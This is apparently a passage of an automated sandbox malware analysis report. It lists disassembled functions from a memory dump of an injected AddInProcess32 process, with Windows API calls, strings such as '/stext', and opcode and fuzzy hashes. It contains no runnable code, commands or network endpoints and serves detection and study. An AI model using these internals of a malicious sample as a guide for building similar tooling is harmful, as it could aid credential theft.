                                                                                                  • malloc.MSVCRT ref: 00409A10
                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                  • free.MSVCRT ref: 00409A31
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: freemallocmemcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3056473165-0
                                                                                                  • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                  • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: d
                                                                                                  • API String ID: 0-2564639436
                                                                                                  • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                  • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset
                                                                                                  • String ID: BINARY
                                                                                                  • API String ID: 2221118986-907554435
                                                                                                  • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                  • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp
                                                                                                  • String ID: /stext
                                                                                                  • API String ID: 2081463915-3817206916
                                                                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                  APIs
                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                  • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2445788494-0
                                                                                                  • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                  • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3150196962-0
                                                                                                  • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                  • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                  Strings
                                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: malloc
                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                  • API String ID: 2803490479-1168259600
                                                                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0041BDDF
                                                                                                  • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcmpmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1065087418-0
                                                                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                  • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 1381354015-0
                                                                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1294909896-0
                                                                                                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                  APIs
                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2154303073-0
                                                                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                  APIs
                                                                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3150196962-0
                                                                                                  • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                  • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                  APIs
                                                                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$PointerRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 3154509469-0
                                                                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                  APIs
                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 4232544981-0
                                                                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 3664257935-0
                                                                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                  APIs
                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                  • String ID:
                                                                                                  • API String ID: 3859505661-0
                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                  APIs
                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2738559852-0
                                                                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                  APIs
                                                                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3934441357-0
                                                                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 3664257935-0
                                                                                                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  APIs
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                  Similarity
                                                                                                  • API ID: ??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 613200358-0
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 3664257935-0
                                                                                                  APIs
                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                  Similarity
                                                                                                  • API ID: EnumNamesResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3334572018-0
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 3664257935-0
                                                                                                  APIs
                                                                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                  Similarity
                                                                                                  • API ID: CloseFind
                                                                                                  • String ID:
                                                                                                  • API String ID: 1863332320-0
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                  Similarity
                                                                                                  • API ID: Open
                                                                                                  • String ID:
                                                                                                  • API String ID: 71445658-0
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3655998216-0
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00445426
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
